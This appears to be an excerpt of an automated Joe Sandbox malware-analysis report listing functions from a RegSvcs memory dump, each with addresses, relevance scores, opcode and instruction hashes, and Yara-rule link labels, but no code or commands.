Opcode Fuzzy Hash: 40b2a5fcce8fbd99e35ebddbeea2a32485a095c58c85b1bcf33869944168392c
Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A

Function 004427B0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

=^"\, xrefs: 004428B7

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: =^"\
API String ID: 0-2152245029
Opcode ID: 30c79af13426789e40e09411e713427a5fad7c453bf973c8dd38d9b25f6a572f
Instruction ID: 31f6d952e69ddc92c57c3d15082e8394249c76af6de0d574896d183d93ceef01
Opcode Fuzzy Hash: 30c79af13426789e40e09411e713427a5fad7c453bf973c8dd38d9b25f6a572f
Instruction Fuzzy Hash: 4281DE383052019BE724DF1CD990A2BB3E2EF89314F54866DF9858B3A0DB35EC51CB0A

Function 0042D830 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042DA2E

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 6564e7b3ad14b453794cbf2f19722db2d5742acb1a2f8ce2a072c031a44184fe
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 23710432F083254BD714CE28E88071FBBE2ABC5710FA9852EE4958B391D239DD45878A

Function 0041A900 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

_;=8, xrefs: 0041AA58

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: _;=8
API String ID: 0-3640539833
Opcode ID: 1d81db7cde41a3e0fb3553ca3b72ed2fa4290f6dd7cddc566a2c3c75c2eae2db
Instruction ID: e58a9c241393c577c0dbf69e703309a02622358f74323d7420d86702d8d0d07f
Opcode Fuzzy Hash: 1d81db7cde41a3e0fb3553ca3b72ed2fa4290f6dd7cddc566a2c3c75c2eae2db
Instruction Fuzzy Hash: 245112B0521B008BC7249F25C8616B3BBF1EF52345B084E5DC4C38BB45E739A948CBA5

Function 00440BAB Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

}I\, xrefs: 00440CA6

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: }I\
API String ID: 0-3759065986
Opcode ID: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
Instruction ID: 06326f033c1d303d2a0c44ae50e6a95f42fac71f38a9198839615570ed5a6674
Opcode Fuzzy Hash: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
Instruction Fuzzy Hash: 653126605546928BEB258F34C8A27B7BBB0FF47310F144759C8C18B785EB78A992CB85

Function 00407620 Relevance: .6, Instructions: 612COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8bb466db5d070fb099be5cdb0fd94ca4abf5b60ced88e2066174f7cb2904948
Instruction ID: ccb3959594043c792932c0cfc7d39f61c3b1d77d2143a35f25ab615b2c98e1b5
Opcode Fuzzy Hash: a8bb466db5d070fb099be5cdb0fd94ca4abf5b60ced88e2066174f7cb2904948
Instruction Fuzzy Hash: 9812B432A0C7118BD725DF18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87

Function 00426C76 Relevance: .6, Instructions: 581COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
Instruction ID: d2e23a67c1903cd1e9c185385271eb72bcb916f6a4fd91b19e1fe5de6aa7faac
Opcode Fuzzy Hash: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
Instruction Fuzzy Hash: 4B122775B00226CBDB14CF68D8917AFB7B2FF8A300F5980A9C441AB3A5D7399D42DB54

Function 00441B20 Relevance: .5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06681fd06d7842ada82dae78e60d469ed9d6c6833ec0578904e50dff9852b5ef
Instruction ID: 0c2c903ba8ab9d1616d7dcc2afe94072de716e40dc01c7b757aa9311b81398a3
Opcode Fuzzy Hash: 06681fd06d7842ada82dae78e60d469ed9d6c6833ec0578904e50dff9852b5ef
Instruction Fuzzy Hash: 41E1ED35609340CFD348CF68E89062BB7E2FB8A315F19897DE98687362D738E945CB45

Function 00405AB0 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e66362c8fb9e42a485a20769d13899b4c0de8f0fb50873082383503af3f25fbe
Instruction ID: c31a76099084191e3034c22a37ea28885ef806c0d431935db3893f7feff996f6
Opcode Fuzzy Hash: e66362c8fb9e42a485a20769d13899b4c0de8f0fb50873082383503af3f25fbe
Instruction Fuzzy Hash: 92F1DE356087418FC724CF29C88066BFBE6EFD9300F08882EE5D597791E679E845CB96

Function 00441BB0 Relevance: .4, Instructions: 434COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e2c5d0afb397b189f10b5a8afc673ab41116975c883d7e1e0ede4eb514e053
Instruction ID: 324ad5c95dff1901f2f9d6c111dcb15fcefbb6efdba5ce0306a944ad1c6f7bef
Opcode Fuzzy Hash: 77e2c5d0afb397b189f10b5a8afc673ab41116975c883d7e1e0ede4eb514e053
Instruction Fuzzy Hash: F0D1EC35619341CFD348CF28D89062BB7E2EB8A315F09897DE98687362D738E945CB45

Function 00441C40 Relevance: .4, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f50f095729c1c5a2da103129e24be9725e6393a4e914a9abcda81a05e9b3429f
Instruction ID: dc21f79cdc73c015b7bd86b7114b814d04dcd303e05c17d6c0f759f64c7459c0
Opcode Fuzzy Hash: f50f095729c1c5a2da103129e24be9725e6393a4e914a9abcda81a05e9b3429f
Instruction Fuzzy Hash: D4D1ED356193408FD358CF38D89062BB7E2EBCA315F09897DE88687392D738E905CB46

Function 00427070 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87ffeb648b9d3b2ccfc57117cdf1fc242bb3e2d04f71168daa08cd74ffe209e9
Instruction ID: 4e43b3032b5f77b82ebf5265758dd730748cf5b28328c74b298a748a547da810
Opcode Fuzzy Hash: 87ffeb648b9d3b2ccfc57117cdf1fc242bb3e2d04f71168daa08cd74ffe209e9
Instruction Fuzzy Hash: A2915635E04225DFDB15CFA8D8907AEB7B2FF4A300F9980A9D502AB351D739AD42CB44

Function 0042DBF0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e074d498d349d20c17923ebbca61cde330de8c03f771f91164867053bffb89f
Instruction ID: 3091657ee4cced5851ca4dbba440f74af0969c41cbc5f8964205a207b597f97a
Opcode Fuzzy Hash: 5e074d498d349d20c17923ebbca61cde330de8c03f771f91164867053bffb89f
Instruction Fuzzy Hash: 5771BAB450D3E08AE7358F25A59839BBFE1AFA3304F584A5DD0D90B392C735440ACB9B

Function 0042BBA0 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c674e0c62231f339c99bb2794b7516979f28c7009b980525353c599bf5cd72a3
Instruction ID: 8f9bf87213cc9725e7ca00057ce5f8087594d7d424e623d20a35489e4cd6523a
Opcode Fuzzy Hash: c674e0c62231f339c99bb2794b7516979f28c7009b980525353c599bf5cd72a3
Instruction Fuzzy Hash: 3861EA317186254BD7249D2DE8C026BB7D2EBC5330F99872EE4B49B3E5D7389C418789

Function 0041B484 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d108ec3c31a6e082106ec2641685d2f0cef7a999d2fab56a64d23736b280515b
Instruction ID: 00f4e2759825dcf10c6fc0e57a4f65ea5fa50f8fe0cbaea4274dafa2f605c2a9
Opcode Fuzzy Hash: d108ec3c31a6e082106ec2641685d2f0cef7a999d2fab56a64d23736b280515b
Instruction Fuzzy Hash: BA4128726147414BD3298B35C8A23B3BBA3EBA6304F1C846EC4D38B756DB3DA50B8754

Function 0041B667 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c7ccca648bacceba5ebfdb24a7e27f770f2e897686419ce5b318d0413d75915
Instruction ID: 6085e876b09a2a4ee967cc73ad16ecd698c2875847a3188e517866274535cc44
Opcode Fuzzy Hash: 3c7ccca648bacceba5ebfdb24a7e27f770f2e897686419ce5b318d0413d75915
Instruction Fuzzy Hash: 6E4129726547414BD32A8A35C8623B3BB93EBE2304F1C946EC4D387792D77D940B8354

Function 004418A0 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4a7be8d6558c3dd8f1df628cb5b2d23227bc2ad90207996850777d529df786d
Instruction ID: 26aced47306ba8243eb9efc204361966fa7a7ce3dd7d84c478a3f5587c373eec
Opcode Fuzzy Hash: d4a7be8d6558c3dd8f1df628cb5b2d23227bc2ad90207996850777d529df786d
Instruction Fuzzy Hash: AC514939A08311CFD7109F64D89026AB3E1FB8A315F0D847ED48997360D339D886CB4A

Function 00402210 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
Instruction ID: 08a7e479931a5a61fa7b69175e4513341166876bb814eb369fc510c4807828e1
Opcode Fuzzy Hash: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
Instruction Fuzzy Hash: 6651C1B19047019BD3109F389D4871BB7A4BB85338F14473DE8A9A73E1E378E915CB8A

Function 0043C9A0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 729b3e7d6e3191008210f842740a6d9190df207d04178a60961e4fc3c3af6df3
Instruction ID: a4b821128decaa172c514915c42a23315f051a59fcda10375df645c6c4b50b9f
Opcode Fuzzy Hash: 729b3e7d6e3191008210f842740a6d9190df207d04178a60961e4fc3c3af6df3
Instruction Fuzzy Hash: DF417C759043146BE310EF24ECC1B6BB7A4EF89708F10942EF985A7251E735EC04879A

Function 0040A05C Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5e5745a9e04c2a491c48c9e8dc2ff63359ea52b338f82eca13cde478cb73e3a
Instruction ID: 0879eb64182fa33bd680848163e7b412a319af03fbceb7a9ba4b6aa96abc02f2
Opcode Fuzzy Hash: e5e5745a9e04c2a491c48c9e8dc2ff63359ea52b338f82eca13cde478cb73e3a
Instruction Fuzzy Hash: 51416033B106518BC71C8E68C9923AAFBA3FB8A310B1E523EC955AB785D77C9C1147C4

Function 0041B243 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e063f326ffa53de25d0b9ba43cf0ed4dbc710327434a92a2670b2cdd79f8318c
Instruction ID: f81eb2cd5989d868f824b990d4dd2db3b11f7867acd7d29f2a686ef0f787acd2
Opcode Fuzzy Hash: e063f326ffa53de25d0b9ba43cf0ed4dbc710327434a92a2670b2cdd79f8318c
Instruction Fuzzy Hash: CE3101312047908BCB288F29C4913ABBBF1DB5A314F18596DC1D787782C33DA8868B58

Function 0041AB2A Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd2de309bfda2136c0d462cb6aa5ae00d2b6fecf143226232f91c3f973c32b9d
Instruction ID: 6e138cb6fd9e5e0f0caf11801ec2ce96e74ed1cdd16602e21eaa68cbd0470f93
Opcode Fuzzy Hash: dd2de309bfda2136c0d462cb6aa5ae00d2b6fecf143226232f91c3f973c32b9d
Instruction Fuzzy Hash: F52128705086C28FD7258B34C8507F3BBA1EF63308F18149ED1C387243E769A55AC769

Function 00438520 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 11cf033bb50aef6adb2bbe7b02e6cb6781f41557c363ff6b9b8f28e1f234bab9
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 8B11A933A052D40EC3168D3C8840565FFE30AD7635F69939EF4B49B2D2DA2ACD8A8359

Function 0042BB00 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c486ac2ce1ad100f0e38d66cbdf0be4d35fa78da5d65ee2e406166fba6341134
Instruction ID: 60ee57cc75265846ada0afa1f54ef24058dfca82aab4f0d1b8d5b1c2d5a04392
Opcode Fuzzy Hash: c486ac2ce1ad100f0e38d66cbdf0be4d35fa78da5d65ee2e406166fba6341134
Instruction Fuzzy Hash: 46019EB1B00B1157DB209E11A8D0B27B7A8AF85708F58443EE8445B746DB79FC05C2D9

Function 0041B184 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5902da4a83a0c680140072e5af1454c543d54360fc1713abbe1431a6a1abbba6
Instruction ID: c9cc8284e85fe6abf120993d5689944f48ac7ce1a7ddbbf0d82d0496898c4a81
Opcode Fuzzy Hash: 5902da4a83a0c680140072e5af1454c543d54360fc1713abbe1431a6a1abbba6
Instruction Fuzzy Hash: 6911D331104B508FD7248F25C8243A7BBE1AB56318F198A5DC1E7877D1DB7AE1098B44

Function 0041B173 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
Instruction ID: f399462e58419c9d3019aec57572db2d86c2935946d127ab36988b8cbde57321
Opcode Fuzzy Hash: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
Instruction Fuzzy Hash: 6A0171745082828FD7128F2994206A6FBE0EF63314F1896C7D4D58BA83C368A985C7A9

Function 0041B882 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
Instruction ID: 925483313e90eaab4478f3efb897dfea373d722ea9097d537696ebe3f586dc89
Opcode Fuzzy Hash: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
Instruction Fuzzy Hash: B90184305082C28ED7128F2984207A6FFA0EF63314F1895C7D4D58F6C3C3689985C7A9

Function 0041BB21 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c35b802276cb4cab2e01238cfef8ad4f73f74ed2e8d92cb0ff5c3d327f1c90cc
Instruction ID: ce15afb6e8349f4df79a6844a38630f2605c57d7838470a331403b3b5471d388
Opcode Fuzzy Hash: c35b802276cb4cab2e01238cfef8ad4f73f74ed2e8d92cb0ff5c3d327f1c90cc
Instruction Fuzzy Hash: 6D01F2745082828EEB128F29D0107A7FBE0EF63314F18969AC4D58F6C3C379D885C7A9

Function 0040C3EC Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd38a00dc9aa6d99ca01aac821546609123fc2e2b8e046733f98ea8146a72aec
Instruction ID: c0b4a7645aed046faff80445a1a00849260a9e0a604dc3165cb580035c2becad
Opcode Fuzzy Hash: cd38a00dc9aa6d99ca01aac821546609123fc2e2b8e046733f98ea8146a72aec
Instruction Fuzzy Hash: C5110C7025C3808FD7148F54D9D576BBBE1ABD2304F244A2CD5C127292D7F5890987A7

Function 0041AEFF Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
Instruction ID: 743bb6218d146487c45d38f060deef663a31a3ebd16d578a5b80eb567479d545
Opcode Fuzzy Hash: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
Instruction Fuzzy Hash: FA01A2205082C28EE7128F2984207B6FFA0EF63314F1896C7D4D58F6C3C3699985C7A9

Function 0040C334 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
Instruction ID: 19ad3dfdcd8e9eec61f1e1188f3eb7c49d356ea6c47e6a039e33f49038878d3c
Opcode Fuzzy Hash: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
Instruction Fuzzy Hash: 0D11087465C3808BD318CF18D9C075BBBE29BD6314F244A2CD5C117295C7B5990ACB6A

Function 0043F0E0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 59ed13ec8eb8bd8147eea6b0df157e6c9ae6c2307cf57b48e0fe75af3e9c5a7e
Instruction ID: 0c7a45b7bc69abfe1ea4a300e8af6adda297262347155a361b302868447e3dd6
Opcode Fuzzy Hash: 59ed13ec8eb8bd8147eea6b0df157e6c9ae6c2307cf57b48e0fe75af3e9c5a7e
Instruction Fuzzy Hash: AFF0D635904214BBD5104F49EC81D37737DE7CE768F141329E514122A2A732AD1186A9

Function 00418672 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0bff55706ff93967b4313bb2a1d7a7ee9ee426091711acca18b712e24a09905
Instruction ID: c14077b8a130247762470a12415ef9365636b0c970e2bf5ce29861a99db5fcbf
Opcode Fuzzy Hash: d0bff55706ff93967b4313bb2a1d7a7ee9ee426091711acca18b712e24a09905
Instruction Fuzzy Hash: B2F08238502120EEC7588F189EC157D73A2F747311729147EC406A31A0DF34ACD2C90E

Function 00409E09 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
Instruction ID: 764d9d3a4717be79920da73eaae230af95e7e9d95c2812270fe992c1b9b69a95
Opcode Fuzzy Hash: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
Instruction Fuzzy Hash: 6FE09A389141058FC708CF58C862677B7B0EF0B301F14A06AD982EB3A0E3389D02C7AC

Function 0040CEC7 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
Instruction ID: 7afc85315bce952cb7d9511845f2cfe5cc4fdaba4f93361a027a170bce18a72b
Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
Instruction Fuzzy Hash: B2E07D3461DA008BE218EF12D95543B73B2AF82308711587E91D3276D2CE78A806DB5D

Function 0042B652 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf2067ab6f32b58c45c9008d31a8987c58cfc8b8a777689b5c00e406fa9fe567
Instruction ID: 85f90f05b7cd9740f0dd11be4e47d539d37879f59d8f753959adedc7e492877d
Opcode Fuzzy Hash: bf2067ab6f32b58c45c9008d31a8987c58cfc8b8a777689b5c00e406fa9fe567
Instruction Fuzzy Hash: 72E08678B18231DBD6148F05F99163AB3A1EFD7305F98543F904657620E334AC02C68F

Function 0041F2A0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 3e00189c545ef2cffbc0a4c45a62ec63a19577d5de140b8962752aa3758dc2ad
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: EDD0A7755487A10E9759CD3804A04B7FBE8E947612B1814EFE4D5E7205D239DC46469C

Function 0040D334 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction ID: 8c6602917fdb956e33e5ed0c062c44bb8739f147fa9184780212f41d8b26cb24
Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction Fuzzy Hash: 50C04C69E6C4008B924CCB15AC5153266769B8B254715E03A841663255E234945B950D

